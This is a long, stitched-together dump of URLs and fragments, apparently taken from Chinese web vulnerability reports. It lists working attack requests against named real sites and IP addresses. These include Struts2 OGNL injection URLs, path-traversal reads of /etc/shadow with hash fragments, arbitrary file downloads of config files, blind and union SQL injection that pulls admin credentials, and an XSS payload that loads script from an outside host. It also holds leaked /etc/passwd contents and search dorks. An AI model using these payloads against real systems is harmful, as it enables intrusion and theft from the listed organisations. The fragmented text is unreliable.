http://203.195.196.198:81/PMT/AjaxUpdatexyz.aspx http://cg.cdb.com.cn http://gs.hust.edu.cn/Invite/listNews.jsp?smclsID=65 http://cwc.hnust.cn/CwcxV4/SF40/Axhfind.asp http://cwc.hnust.cn/admin/login.asp http://www.panqiu.com/NewNews/newsalloldnees.aspx?Ty=34这是注入点! http://www.panqiu http://202.104.113.11:8081/ http://www.zhejiangmuseum.com http://60.191.2.115:81/index.do?method=index https://sslvpn.nctu.edu.tw/dana-na/auth/url_default/welcome.cgi http://www.so.com/s?psid=572f0ec7e447aecbad9eb3a188c56d06&q=烟草网上订货平台&pq=全省网上订货系统&src=srp&fr=se7_drag http://58.214.20.149/ebp/jsp/base/newsPress/showNews.jsp?newsid=109854 http://www.tobaccosz.com/ebp/jsp/base/newsPress/showNews.jsp?newsid=111 http://222.187.198.252/ebp/jsp/base/newsPress/showNews.jsp?newsid=100322 http://221.230.7.83/ebp/jsp/base/newsPress/showNews.jsp?newsid=104079 http://www.hatobacco.com/ebp/jsp/base/newsPress/showNews.jsp?newsid=101021 http://222.135.77.242:85/jwb/ http://61.141.236.11/ ServiceMobile.asmx/GetRule http://mtodo.wanda.cn/ http://www.mydisk.biz/redirect.php,和HostName:asdf字段。 http://我不告诉你.就是不告诉你/*07J9Q http://b2b.suning.cn/scs/settlement/20101020/dx1002550811211000091034.html http://b2b.suning.cn/scs/settlement/20101020/dx1002945122021000091030.html http://b2b.suning.cn/scs/settlement/20100520/dx1000405017001000083007.html http://b2b.suning.cn/scs/settlement/20110209/dx1001346924001000096784.html http://b2b.suning.cn/scs/settlement/20110319/dx1000406314001000098821.html http://b2b.suning.cn/scs/settlement/20090919/dx1001225325001000070020.html http://219.239.44.26/loginAction!login.action http://219.239.44.26/loginAction!login.action?redirect://baidu.com http://219.239.44.26/loginAction!login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://smile.wanda.cn http://nnsapq.mep.gov.cn/companys.aspx?ctype=-1&keyword=-1 http://www.jdeyes.com http://mine.cumt.edu.cn/TM%20system/readnotice.asp?id=42 http://114.215.236.136:28017/ http://**.**.**/login!loginPage.html http://**.**.**/login!loginPage.html http://59.41.59.172/player.php?id=110 www.bjzzcx.com inurl:CnProductShow.asp?id=(中文站) inurl:EnProductShow.asp?id= http://www.sfiasia.com.cn/Island_Oasis/cnProductShow.asp?ID=132&productClass=45 http://www.mc2lighting.com/cnproductshow.asp?id=17 http://www.aisat.com.cn/cnProductShow.asp?id=23 http://www.kingdom-hardware.com/ware/cnproductshow.asp?ID=292 http://www.yongzhan.net/zhan/cnproductshow.asp?ID=280 http://led0579.com/cnproductshow.asp?big=42&id=444 http://www.tcmile.com/tl/cnproductshow.asp?id=27 http://www.amplestarenterprises.com/cnproductShow.asp?ID=146 http://fireworksyiwu.com/cnproductshow.asp?big=4&id=78 http://www.led0579.com/cnproductshow.asp?big=45&id=451 http://leyiduo.com/enproductshow.asp?id=117 http://www.gdolair.com/EnProductShow.asp?ID=345 http://www.sansentech.com/EnProductShow.asp?ID=117 http://www.loyaltoy.com/enProductShow.asp?ID=4111 http://eewell.com/EnProductShow.asp?ID=343 http://www.smwjw.com/sm/EnProductShow.asp?ClassID=20&ID=702 http://www.sehon.net/sh/enproductshow.asp?id=1963 http://www.econuodigital.com/enProductShow.asp?ID=281 http://www.szsuniu.com/enProductShow.asp?ID=339 http://www.dhltchem.com/EnProductShow.asp?ID=103 http://www.morewintyre.com/enProductshow.asp?ID=139 http://www.gdwenshen.com/enProductShow.asp?ID=8458 http://www.ywclock.com/web/EnProductShow.asp?ID=304 http://180.153.17.181:8080/itsm/login/index.action http://bbs.gionee.net/management http://183.60.42.157:28017/ inurl:Jhsoft.Web.login http://www.ccteboa.com/c6/Jhsoft.Web.login/AjaxForLogin.aspx http://218.17.227.196/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://oa.originseed.com.cn/C6/Jhsoft.Web.login/AjaxForLogin.aspx//不跟随302跳转 http://www.xiyuefa.com:802/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://oa.inofa.com/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://oa.kanq.com.cn:808/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://oa.guoxiang.com.cn/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://demos.jh0101.com/c6v32/Jhsoft.Web.login/AjaxForLogin.aspx https://arp.fjirsm.ac.cn/por/login_psw.csp http://**.**.**/ http://**.**.**/twiki/bin/view/Networkarchitecture/WebHome http://www.fjyajy.com/ http://openjira.deppon.com/ res.byd.cn/invoker/JMXInvokerServlet http://res.byd.cn/jbossws13/ jboss-4.2.3.GA/server/default/./deploy/jbossws13.war/jbossws13/]$ jboss-4.2.3.GA/server/default/./deploy/jbossws13.war/jbossws13/ jboss-4.2.3.GA/bin/]$ encap:Ethernet addr:10.9.33.87 Bcast:10.9.33.255 Mask:255.255.255.0 fe81:4d98/64 Scope:Link MTU:1500 packets:105179280 packets:16662536 txqueuelen:1000 https://nbs.byd.com.cn:8443/login.jsp https://nbs.byd.com.cn:8443/Login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin htt:x:100:103:IIIMF Htt:/usr/lib/im:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin gll:x:500:500::/home/gll:/bin/bash oracle:x:501:501::/home/oracle:/bin/bash encap:Ethernet CD:52:BE:93 addr:10.1.4.60 Bcast:10.1.4.255 Mask:255.255.255.0 cdff:fe52:be93/64 Scope:Link MTU:1500 packets:18430541 packets:13014913 txqueuelen:1000 http://club.bydauto.com.cn/ http://club.bydauto.com.cn/uc_server/admin.php?sid=5669w4yC%2BsSJl%2Bs5LhoULI7HztpSb3bCyr0QX%2FZt5nt8hkyg5Qb1wlNoCGggJ6Z6eM9p%2BHVatW%2FBFQ PHP:Linux http://www.bxt189.com/account/index http://hniec.net/newsshow.jsp?infoId=INFO0000003592 http://hniec.net/eos/login.jsp?type=student http://oa.inofa.com/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://oa.inofa.com/ http://61.160.137.144/index.shtml http://61.160.137.144:80/sys/reviewImage.shtml?name=../../../../../../../../../../etc/shadow Zu8gzrvTx0av65aq:16135 lG:16135:0:99999:7 Qwy:16317:6:90:30 http://183.62.26.7/TPS/web/login.jsp http://oa8000.com,可以看到有个在线试用,然后点击进去,这里给我们提供了用户名和密码,只要登录就好了 http://wooyun.org/bugs/wooyun-2014-083670漏洞的修补不完善导致的。 http://123.101.1.162/javaapp/login.jsp http://60.217.226.35:8080/globeyes/index.jsp http://60.217.226.35:8080/globeyes/admin/index.jsp URL:http://zdh.nchu.edu.cn/admin/picupload.asp http://dbook.lib.pku.edu.cn/1.txt ftp://dbook.lib.pku.edu.cn/ http://www.shenhuafc.com.cn/ http://www.shenhuafc.com.cn/news_detail.php?newsId=5123 http://www.shenhuafc.com.cn/shenhuagl.php http://wooyun.org/bugs/wooyun-2010-078477 http://219.149.148.32/step1.jsp http://fans.51job.com/QVniqi http://admin.oa.ems.scjc.net.cn,该页面模仿的是exchange的页面风格,导致很多非技术类的用户信以为真。如图: http://apprl.apletsrye.cn.com/apple1.asp QQ:19006**20 http://sz.58.com/wangzhan/19578267944457x.shtml http://www.airzj.com/airzj/asp/jjt.asp http://www.airzj.com/airzj/asp/jjt_airport.asp http://www.hdhy.xm.gov.cn http://www.hdhy.xm.gov.cn/admin/index.asp http://www.hdhy.xm.gov.cn/upload_flash.asp?formname=addPro&editname=D_Path&uppath=down&filelx=doc http://www.hdhy.xm.gov.cn/upload_flash.asp?formname=addPro&editname=Pic_Path&uppath=down&filelx=jpg http://kf2.meizu.com/zdy_dbgg2.php?style_id=103301880&company_id=61397712&dbgg_type=2 comicinterfacetwo.asmx/GetProList http://202.41.245.3/liuyan/cjwt.jsp?CState=2 http://202.41.245.3/gonggao/newsview.jsp?id=801 http://202.41.245.3/liuyan/yhd.jsp?precolumn1=2 http://202.41.245.3/liuyan/yhd.jsp http://202.41.245.3/liuyan/cjwt.jsp?CState=2 http://art.nchu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 SQl:http://zjc.ccucm.edu.cn/index.php?m=Content&a=show&id=79 http://merchant.xkeshi.com/ http://sy.cxxy.seu.edu.cn/js/ShowXmCg.aspx?itemno=137 http://202.195.210.177/xkjs/ShowXmCg.aspx?itemno=137 http://218.90.212.43:9025/xkjs/ShowXmCg.aspx?itemno=137 http://sjjx.siso.edu.cn/jnjs/ShowXmCg.aspx?itemno=137 http://202.195.237.148/xkjs/ShowXmCg.aspx?itemno=137 http://www.ysten.com/ http://www.haitiansoft.com:8080/ http://180.166.7.94/PowerSelect.asp?FieldValue= http://oa.tjfsu.edu.cn/PowerSelect.asp?FieldValue= http://www.fzsyxx.com/oa/PowerSelect.asp?FieldValue= http://vos.tjufe.edu.cn/PowerSelect.asp?FieldValue= http://www.shhjwl.com/vos/PowerSelect.asp?FieldValue= http://mail.gionee.com/m/index.action http://mail.gionee.com:8000/snspam/homepage.asp http://mail.gionee.com/css1.jsp http://www.samsoncn.com/product/Customers.aspx http://www.cphc.cn/news/Details.aspx?ShortName=default&NewsId=15 http://www.zgyygl.com/news/Details.aspx?ShortName=default&NewsId=15 http://www.cn-he.cn/News/Details.aspx?ShortName=default&NewsId=9 https://github.com/lewcok/APInerfacer/blob/b42f22aed3794cc7a327ecdcb4e60dd4cfe5396d/laifusiDataCenterQuartz/src/main/java/com/laifusi/datacenter/quartz/util/Email.java site:travelzen.com http://portal.wanhui.cn/ http://app.wanhui.cn/ http://app.wanhui.cn/downloadlink?r=http://www.baidu.com http://app.wanhui.cn/test/downloadlink?r=http://www.baidu.com http://www.wanda-cti.com/ www.wanda-cti.com/test.php http://car.yundasys.com:81/yd_khd/khd_add.php http://car.yundasys.com:81/yd_khd/可以猜到或者通过 http://car.yundasys.com:81/yd_khd/khd_list.php?lb=1&submit=查询 http://car.yundasys.com:81/yd_khd/ClientsPath/1.php https://github.com/houyafeng/myrepo/blob/f5dab1758190d0425df8bb09f6dc879de0630cbf/perl/tools/findtotle.pl https://github.com/guolin21/alarm/blob/1ce3bce545d9a667949b22f9ab9a41eee12e1748/mysite/filter/sendmail.py http://exmail.qq.com/login http://my.hupu.com/search?q=%27 http://pan.baidu.com/s/1s8Xm2,提取码:up8m,解压密码:wpspoc123。 http://www.tcfanggai.com/dongtai_display.php?id=101 http://ibook.12580life.com/bookList?searchtype=0&order=1&bookCategory=5 https://github.com/EducationAdministrationSystem/EducationAdministrationSystem/blob/2cc0ade40a1fa918d14015161e402cd047bec403/settings.py http://mail.dlut.edu.cn https://github.com/pprivulet/TrafficBureau/blob/17409bf70b6e3dcca2ae9ccd49fbbe512f282871/tb/src/com/tb/test/SendMail.java http://mail.tsari.tsinghua.edu.cn http://v2014.rccms.com/member/index.php?m=person_interview&show=works这个页面,删除面试通知处。 http://events.travelzen.com/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin hobbit:x:2002:2002::/home/hobbit:/bin/bash vincent:x:2003:2003::/home/vincent:/bin/bash cheung:x:2004:2004::/home/ch.cheung:/bin/bash danis:x:2005:2005::/home/danis:/bin/bash peng:x:2006:2006::/home/echo.peng:/bin/bash music:x:2007:2007::/home/music:/bin/bash tam:x:2008:2008::/home/ken.tam:/bin/bash sun:x:2009:2009::/home/harris.sun:/bin/bash yeung:x:2010:2010::/home/andy.yeung:/bin/bash chan:x:2011:2011::/home/beni.chan:/bin/bash chen:x:2012:2012::/home/tigra.chen:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin ibeatbeta:x:2013:2013::/home/ibeatbeta:/bin/bash zhou:x:2014:2014::/home/dianyi.zhou:/bin/bash http://store.hotel.tdxinfo.com/tops-front-purchaser-hotel/pur/order/hotel/orderView http://store.tdxinfo.com/tops-front-purchaser//additional/insurance/product/viewMainPage http://labs.chinamobile.com:80/ http://my.ecupl.edu.cn/main/loginIndex.do http://www.10106266.com/www.rar http://school.enetedu.com/AdminIndex/Login?type=sessionTimeOut http://uxss.sinaapp.com/ http://1.m4sktest.sinaapp.com/uxss/uxss1.html http://211.151.146.175:8080/login.do http://huanhua.nchu.edu.cn/downnews.asp?id=150 http://www.bcrj.com.cn/ http://210.30.190.28/ http://210.30.190.28 http://www.ztehome.com.cn/support/searchRsltTable.php?id=6 https://www.nauvpn.cn/por/login_psw.csp http://bkcms.fdsm.fudan.edu.cn/login.jsp http://buy.qd.sd.cn/login.php http://www.169jk.com:8088/App_Page/Reserve/ReserveHandler.ashx?Mode=userAuthorize&account=122331&password=123456 http://www.haitiansoft.com:8080/ http://oa.tjfsu.edu.cn/kaoQin/JiaoYanDis.asp?StartDate=1 http://www.fzsyxx.com/oa/kaoQin/JiaoYanDis.asp?StartDate=1 http://vos.tjufe.edu.cn/kaoQin/JiaoYanDis.asp?StartDate=1 http://www.shhjwl.com/vos/kaoQin/JiaoYanDis.asp?StartDate=1 http://121.30.226.44/kaoQin/JiaoYanDis.asp?StartDate=1 http://119.147.136.178:9080/login.action http://www.coastalbank.cn http://www.coastalbank.cn/bill.php?id=21 https://117.22.253.67/por/login_psw.csp http://www.dagexing.com/SearchWordManage_getAllSearchResult.do?stype=&page=0&searchWord=%3Cscript%20src%3Dhttp%3A%2f%2fxss.re%2f6532%3E%3C%2fscript%3E http://www.dagexing.com/SearchWordManage_getAllSearchResult.do?stype=&page=0&searchWord=%3Cscript%3Ealert%28String.fromCharCode%2888,%2083,%2083%29%29%3C/script%3E dawanjia.com/admin.php http://www.flyhigh.com.cn/admin.php?ctrl=admin&ac=adminUserUp&id= http://xheditor.com/img/xheditor-logo.gif/a.php https://github.com/jianjianni521/xuexibao/blob/e69b2d3377e2bb4196e3cf4c65379ac224ae2e3d/src/mail.properties https://github.com/david3424/rain/blob/94ba2c4b8f0996f38b82daa8874ba05f7660f8ac/bhhd/src/main/resources/config/spring-mail.xml http://b2b.tdxinfo.com/buyer/FrequentFlyerEditor.aspx?id=503189097&_=1416632585522 http://xmgl.fjkjt.gov.cn/p_itemsearch.pr.pr_itemsearch.do http://pic.lvmama.com/min/index.php?f=/min/config.php%00.css http://pic.lvmama.com/min/index.php?f=/min/index.php%00.css http://222.136.71.181/ http://old.tdxinfo.com/config/ http://gnjp.tdxinfo.com/download/ http://b2b.tdxinfo.com/buyer/systemmanage/DownLoad.aspx?filename=/attached/file/20131129/20131129144847_1447.doc http://b2b.tdxinfo.com/buyer/systemmanage/DownLoad.aspx?filename=c:/windows/system32/cmd.exe http://b2b.tdxinfo.com/ gnjp.tdxinfo.com/FrameWork/Register.aspx http://b2b.tdxinfo.com/Buyer/SystemManage/DownLoad.aspx?filename= http://openapi.tdxinfo.com:8080/index.jsp# http://www.zsztb.gov.cn/PubNews/PubNewsView.aspx?parentclassid=01 http://www.metc.pku.edu.cn/dd.php?id=368 http://www.zhzyw.cc/zhzyw/nr/showinfo.php?dictid=28 http://58.222.221.130:93/ http://58.222.221.130:94/userManager/frmUserManager.aspx http://58.222.221.130:94/userManager/frmGroupManager.aspx http://58.222.221.130:8090/prelogin.action http://admin.uvip.cn/domain-admin/domainModify.net?IDDomain=11515742 http://60.174.37.244:8888/index!WCIndex.action http://60.174.37.244:8888 http://www.pfc.edu.cn/Awebsite/NewList.aspx?t=34 http://store.tdxinfo.com http://yibo.iyiyun.com/Index/adInfos/ad_id/393/size_id/10?_=1416641431861 http://yibo.iyiyun.com/Index/adInfos/ad_id/392/size_id/10?_=1416642150286 http://ycxcb.gov.cn/picnews.asp?id=47 http://ycxcb.gov.cn/admin/admin_login.asp http://jz.dqjsj.gov.cn/type.asp?typeid=3 http://jz.dqjsj.gov.cn/admin/index.asp http://www.sysjtj.gov.cn/tzgg_nei.asp?n_id=507 http://www.sysjtj.gov.cn/admin_index.asp http://www.cengang.gov.cn/show_detail.asp?id=1610 http://www.cengang.gov.cn/admin/ http://www.ycxcb.gov.cn/picnews.asp?id=47 http://www.ycxcb.gov.cn/admin http://www.jzkfqaic.gov.cn/Article_Class2.asp?ClassID=5 http://www.jzkfqaic.gov.cn/admin_index.asp http://zfbz.10.gov.cn/list.asp?bigclassid=78 http://zfbz.10.gov.cn/admin/admin.asp http://tz.10.gov.cn/smalllist.asp?smallclassid=182 http://tz.10.gov.cn/admin/admin.asp http://220.180.15.170:28017 http://store.hotel.tdxinfo.com/tops-front-purchaser-hotel/pur/order/hotel/orderView http://www.sfdaic.org.cn http://www.sfdaic.org.cn/sfdaic/jsp/preview_1.jsp?TID=20141119143701193239900 http://www.ceic.ac.cn/history?start=%27&end=&weidu1=&weidu2=&jingdu1=&jingdu2=&height1=&height2=&zhenji1=&zhenji2=&sub=%E6%9F%A5%E8%AF%A2 http://data.weibo.com/report/analystarticle?id=2205075871 http://data.weibo.com/report/reportDetail?id=193 http://data.weibo.com/report/analystarticle?id=2131772313 http://www.sqlmap.org http://www.threeoa.com/product/ http://zjyiz.zje.net.cn/us/user/get_password_p.jsp http://united.soufun.com.tw/fckeditor/ditor/filemanager/browser/default/connectors/aspx/connector.aspx文件未删除,导致漏洞存在 http://united.soufun.com.tw/UserFiles/File/test.asp password:test http://ygb.ncu.edu.cn/yjsh/login.aspx http://ygb.ncu.edu.cn/yjsh/WebResource.axd?d=b99-7JT4MtcpmaC1IrbBKEZUVDsRrtRZk7G7d9E5iySTDSkF-f64urSQm6pJ3aIsmY_KScCXLOaMsd-ft6fR9YyMcf9Vo4VQCDcpI1Fr59Q1 http://ygb.ncu.edu.cn/yjsh/ScriptResource.axd http://ygb.ncu.edu.cn/yjsh/yjsh.rar http://jpkc.hustwb.edu.cn/dgdz/news_show.asp?id=207 http://jwc.hustwb.edu.cn/找到数据库后台phpmyadmin登陆,直接影响全部数据 http://b2b.tdxinfo.com//Buyer/BuyerUserEditor.aspx?id=500002110&_=1416664102998 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%201=2 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20exists%28select%20*%20from%20users%29 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20exists%28select%20username%20from%20users%29 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20exists%28select%20userpwd%20from%20users%29 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20len%28username%29%20from%20users%29=5 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20len%28userpwd%29%20from%20users%29=16 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20asc%28mid%28username,1,1%29%29%20from%20users%29=97 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20asc%28mid%28userpwd,1,1%29%29%20from%20users%29%3E50 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20asc%28mid%28userpwd,1,1%29%29%20from%20users%29%3E51 http://nlbbs.9hgame.com/ http://nlbbs.9hgame.com Www.Evilys.Ml User:root@localhost user:root Table_pre:cdb http://www.ct10001.com.cn/alertnews.php?seqs=9 http://tnew.caijing.com.cn/ http://wooyun.org/test.js http://jnnews.jnu.edu.cn/qiandao/AttendList.asp?id=292 http://www.dixintong.com http://m.dixintong.com/activity.aspx?id=1322 http://yxzy.hrbmu.edu.cn:8080/cjxy/index.php http://yxzy.hrbmu.edu.cn:8080/cjxy/listPage.php?nt_id=2 http://www.zyzypc.com.cn/UserFiles/File/ali.asp http://admissions.shisu.edu.cn/zswweb/upload/base/ http://admissions.shisu.edu.cn/zswweb/upload/recommendation/ http://admissions.shisu.edu.cn/zswweb/upload/freshManInfo/ http://admissions.shisu.edu.cn/zswweb/base/.svn/ http://222.39.14.168/security,本来以为会有403这样的错误,,但是,,竟然网页目录直接呈现在我的眼前。。。这样连密码都不用了。。直接访问就OK www.ms-fda.gov.cn http://www.scmb.gov.cn/Article_Class.asp?ClassId=66 http://www.scmb.gov.cn/Admin_Index.asp ftp://112.126.126.29/ http://1.202.224.70:8080/ http://1.202.224.70:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://1.202.224.70:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://1.202.224.70:8080/resin-doc/examples/security-basic/viewfile?file=index.jsp http://java.sun.com/jsp/jstl/core http://1.202.224.21:8086/ http://1.202.224.21:8086 http://www.southsoft.com.cn/Case.asp?id=941 http://gsnfu.njfu.edu.cn/web_admin/main.aspx为例 http://1.202.224.78/ http://1.202.224.78 http://store.tdxinfo.com/tops-front-purchaser//divert/member/infoContainer http://b2b.tdxinfo.com http://ylht.tdxinfo.com/ gjjp.tdxinfo.com/static.tdxinfo.com/upload.tdxinfo.com http://61.133.221.210/ http://61.133.221.210/nzcms_list_news.asp?id=674&sort_id=658%0aand%0a1=2%0aunion%0aselect%0a1,username,3,4,5,6,7,8,9,10,11,12,13%0afrom%0anzcms_admin http://61.133.221.210/nzcms_list_news.asp?id=674&sort_id=658%0aand%0a1=2%0aunion%0aselect%0a1,userpassword,3,4,5,6,7,8,9,10,11,12,13%0afrom%0anzcms_admin http://61.133.221.210/nz0808/ http://222.35.36.235:9901/ http://118.123.221.110:8080/mobileportal/detailCommodity.do?commodityId=5d410841-b520-452e-92ca-c90050bd88e1 http://1.202.224.20/ http://app.xmsme.gov.cn/soft/softty/mainfrm.aspx www.ktvc8.com http://gnjp.tdxinfo.com/FrameWork/Login.aspx http://b.agent.fang.com/Magent/Agent/friendinfo/CooperationManger.aspx?action=del&SymbiosisId=1117 http://usercenter.12308.com/resetPwd/resetPwdByMobilePage.html http://usercenter.12308.com/resetPwd/resetPwdByMobileStep4Page.html url:http://www.aliued.com http://xxx.com/?author=1 http://xxx.com/?author=100 http://xxx.com/wp-login.php www.haust.edu.cn/article/detail.aspx?id=33 http://zxxx.yyedu.gov.cn http://www.aliued.cn这是阿里巴巴中国站的网站 http://xxx.cn/?author=1 http://xxx.cn/?author=100 http://www.aliued.cn/wp-login.php http://www.xjjygh.org.cn/details.aspx?id=3820 http://v2014.rccms.com/member/index.php?m=company_hirelist&show=hire&t=addform&id=1018 http://60.28.219.72/secure/Dashboard.jspa http://v2014.rccms.com/wap/?a=savevhire&wap http://v2014.rccms.com/wap/,然后选择发布微招聘 http://v2014.rccms.com https://github.com/cwenao/wedonation/blob/3db8e715b7abf516c93c2ce89b10d5ce77b22206/WebRoot/mobile/conationpay.jsp http://www.saclub.com.cn/searchGasPumpHist.do https://github.com/zhengzc/activitiTest/blob/e768cc3e0a9d0b682aaf08a36264e02b71d360a1/src/main/resources/spring/applicationContext.xml http://mail.travelzen.com/ http://60.217.226.35:8080/globeyes/index.jsp,如图所示: https://github.com/duanshuaimin/zyyt/blob/70eb1010ab18118fd8940e9be2e928ccc58e6170/MobileActiveCheck.py https://3g.*****cn:1445/msp.do http://manager.17k.com/menu.html http://manager.17k.com/test/goModifyBookAuthLevelDate.action http://manager.17k.com/liansai/queryLiansaiInfo.action http://manager.17k.com/liansai/queryTutorListByZoneStatus.action http://manager.17k.com/liansai/modifyLastWin.action http://manager.17k.com/liansai/findGameTeamMsg.action http://211.160.21.136/ http://rcc086.com/userlogin.action http://www.digilink086.com/userlogin.action http://tx.dgis.cn/txbz.action?type=1 http://cs.dgis.cn/txbz.action?type=1 http://www.ikamobile.cn/ http://b2b.tdxinfo.com/Buyer/SystemManage/DownLoad.aspx?filename=C:/Windows/System32/drivers/etc/hosts http://b2b.tdxinfo.com/Buyer/SystemManage/DownLoad.aspx?filename=c:\Windows\win.ini http://b2b.tdxinfo.com/Buyer/Notice.aspx?id=140a&fid=NCG50000 http://b2b.tdxinfo.com/Buyer/SystemManage/DownLoad.aspx?filename=E:\supper_oa1\crm\web.config http://*********com"/ http://*********am"/ http://*********/byc-insurance/insure/chinapnrNotify.shtml"/ http://2*********3/byc-oth/insure.shtml"/ http:/**********tml http://203**********y.shtml http://19**********?action=refund http://**********Alipay_Return.aspx http://********************spx http:/**********PNR/ChinaPNR_Notify.aspx http://**********_Return.aspx http://**********Refund_Notify.aspx http:/*******pic.shtml"/ http://mail.10106266.com/admin/ http://jdht.tdxinfo.com/可以查酒店订单 http://ylht.tdxinfo.com/basedata/Template.aspx也可以操作 www.fjccl.com www.clinet.com.cn www.gdccl.com.cn www.nccl.cn www.caclm.org.cn www.jsccl.com http://mini.renren.com/manage/index.jsp http://60.2.247.134/ http://116.228.55.142:7006/permerchant/ 